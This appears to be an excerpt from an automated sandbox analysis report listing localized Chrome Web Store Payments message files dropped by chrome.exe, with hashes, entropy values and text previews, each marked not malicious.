                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):595
                                                                                                                                                                                                                            Entropy (8bit):4.467205425399467
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJfPGGGfPG+WYpU34Ze7z+dgrW9O8ZpU34ZwZz03OyZnLAOfTYgoLIR:1HEdvqlWYpTeObk8ZpT/OGAOfuLIR
                                                                                                                                                                                                                            MD5:CFF6CB76EC724B17C1BC920726CB35A7
                                                                                                                                                                                                                            SHA1:14ED068251D65A840F00C05409D705259D329FFC
                                                                                                                                                                                                                            SHA-256:C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
                                                                                                                                                                                                                            SHA-512:53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):647
                                                                                                                                                                                                                            Entropy (8bit):4.595421267152647
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
                                                                                                                                                                                                                            MD5:3A01FEE829445C482D1721FF63153D16
                                                                                                                                                                                                                            SHA1:F3EAAADDC03F943FC88B30B67F534AA13E3336DD
                                                                                                                                                                                                                            SHA-256:0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
                                                                                                                                                                                                                            SHA-512:3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):658
                                                                                                                                                                                                                            Entropy (8bit):4.5231229502550745
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
                                                                                                                                                                                                                            MD5:57AF5B654270A945BDA8053A83353A06
                                                                                                                                                                                                                            SHA1:EEEF7A4F869F97CF471A05D345E74F982D15E167
                                                                                                                                                                                                                            SHA-256:EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
                                                                                                                                                                                                                            SHA-512:5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):677
                                                                                                                                                                                                                            Entropy (8bit):4.552569602149629
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
                                                                                                                                                                                                                            MD5:8D11C90F44A6585B57B933AB38D1FFF8
                                                                                                                                                                                                                            SHA1:3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
                                                                                                                                                                                                                            SHA-256:599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
                                                                                                                                                                                                                            SHA-512:D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):835
                                                                                                                                                                                                                            Entropy (8bit):4.791154467711985
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
                                                                                                                                                                                                                            MD5:E376D757C8FD66AC70A7D2D49760B94E
                                                                                                                                                                                                                            SHA1:1525C5B1312D409604F097768503298EC440CC4D
                                                                                                                                                                                                                            SHA-256:8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
                                                                                                                                                                                                                            SHA-512:673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):618
                                                                                                                                                                                                                            Entropy (8bit):4.56999230891419
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
                                                                                                                                                                                                                            MD5:8185D0490C86363602A137F9A261CC50
                                                                                                                                                                                                                            SHA1:5BD933B874441CEACB9201CCC941FF67BAED6DC0
                                                                                                                                                                                                                            SHA-256:A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
                                                                                                                                                                                                                            SHA-512:D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):683
                                                                                                                                                                                                                            Entropy (8bit):4.675370843321512
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
                                                                                                                                                                                                                            MD5:85609CF8623582A8376C206556ED2131
                                                                                                                                                                                                                            SHA1:1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
                                                                                                                                                                                                                            SHA-256:32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
                                                                                                                                                                                                                            SHA-512:27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):604
                                                                                                                                                                                                                            Entropy (8bit):4.465685261172395
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
                                                                                                                                                                                                                            MD5:EAB2B946D1232AB98137E760954003AA
                                                                                                                                                                                                                            SHA1:60BDC2937905B311D2C9844DF2D639D7AC9F7F67
                                                                                                                                                                                                                            SHA-256:C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
                                                                                                                                                                                                                            SHA-512:970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):603
                                                                                                                                                                                                                            Entropy (8bit):4.479418964635223
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
                                                                                                                                                                                                                            MD5:A328EEF5E841E0C72D3CD7366899C5C8
                                                                                                                                                                                                                            SHA1:2851ED658385804E87911643F5A4200B1FB26E13
                                                                                                                                                                                                                            SHA-256:CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
                                                                                                                                                                                                                            SHA-512:E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):697
                                                                                                                                                                                                                            Entropy (8bit):5.20469020877498
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
                                                                                                                                                                                                                            MD5:9B3A5D473C3F2BBFAEECE94A07A940B8
                                                                                                                                                                                                                            SHA1:61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
                                                                                                                                                                                                                            SHA-256:706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
                                                                                                                                                                                                                            SHA-512:94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):631
                                                                                                                                                                                                                            Entropy (8bit):5.160315577642469
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
                                                                                                                                                                                                                            MD5:9F6B4D82A70C74CA751E2EAE70FAB5CF
                                                                                                                                                                                                                            SHA1:0534F125FFCE8222277CF2BE3401C59DAF9217F8
                                                                                                                                                                                                                            SHA-256:D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
                                                                                                                                                                                                                            SHA-512:ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):665
                                                                                                                                                                                                                            Entropy (8bit):4.66839186029557
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
                                                                                                                                                                                                                            MD5:4CA644F875606986A9898D04BDAE3EA5
                                                                                                                                                                                                                            SHA1:722A10569E93975129D67FBDB75B537D9D622AD1
                                                                                                                                                                                                                            SHA-256:7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
                                                                                                                                                                                                                            SHA-512:E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):671
                                                                                                                                                                                                                            Entropy (8bit):4.631774066483956
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
                                                                                                                                                                                                                            MD5:C5CE2C51391EAFD3DA9E4C71549A3C28
                                                                                                                                                                                                                            SHA1:1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
                                                                                                                                                                                                                            SHA-256:1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
                                                                                                                                                                                                                            SHA-512:C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):624
                                                                                                                                                                                                                            Entropy (8bit):4.555032032637389
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJhiOGGhiO+WYpU34OHSN+dgFjdGFZO8ZpU34JgdN03OyZnLAOfTYiD:1HEDiHIitWYpCYJ8ZpD1OGAOfRD
                                                                                                                                                                                                                            MD5:93C459A23BC6953FF744C35920CD2AF9
                                                                                                                                                                                                                            SHA1:162F884972103A08ADB616A7EB3598431A2924C5
                                                                                                                                                                                                                            SHA-256:2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
                                                                                                                                                                                                                            SHA-512:F76E6E8D8499306883C3EC1E774F7E8BB6B601096DA5A14D17D3E7D5732829542041E42B7350466589291ADCC83FB065FD591B4E20CFCF8EDC586E128ECBFCB5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Nettmarked-betalinger".. },.. "app_name": {.. "message": "Chrome Nettmarked-betalinger".. },.. "craw_app_unavailable": {.. "message": "Appen er utilgjengelig for .yeblikket.".. },.. "craw_connect_to_network": {.. "message": "Du m. koble til et nettverk.".. },.. "iap_unavailable": {.. "message": "Betaling i app er ikke tilgjengelig for .yeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Du m. logge p. Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):615
                                                                                                                                                                                                                            Entropy (8bit):4.4715318546237315
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
                                                                                                                                                                                                                            MD5:7A8F9D0249C680F64DEC7650A432BD57
                                                                                                                                                                                                                            SHA1:53477198AEE389F6580921B4876719B400A23CA1
                                                                                                                                                                                                                            SHA-256:92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
                                                                                                                                                                                                                            SHA-512:969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):636
                                                                                                                                                                                                                            Entropy (8bit):4.646901997539488
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
                                                                                                                                                                                                                            MD5:0E6194126AFCCD1E3098D276A7400175
                                                                                                                                                                                                                            SHA1:E8127B905A640B1C46362FA6E1127BE172F4A40F
                                                                                                                                                                                                                            SHA-256:E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
                                                                                                                                                                                                                            SHA-512:A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):636
                                                                                                                                                                                                                            Entropy (8bit):4.515158874306633
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
                                                                                                                                                                                                                            MD5:86A2B91FA18B867209024C522ED665D5
                                                                                                                                                                                                                            SHA1:63DEC245637818C76655E01FCB6D59784BC7184E
                                                                                                                                                                                                                            SHA-256:6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
                                                                                                                                                                                                                            SHA-512:DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):622
                                                                                                                                                                                                                            Entropy (8bit):4.526171498622949
                                                                                                                                                                                                                            Encrypted:false
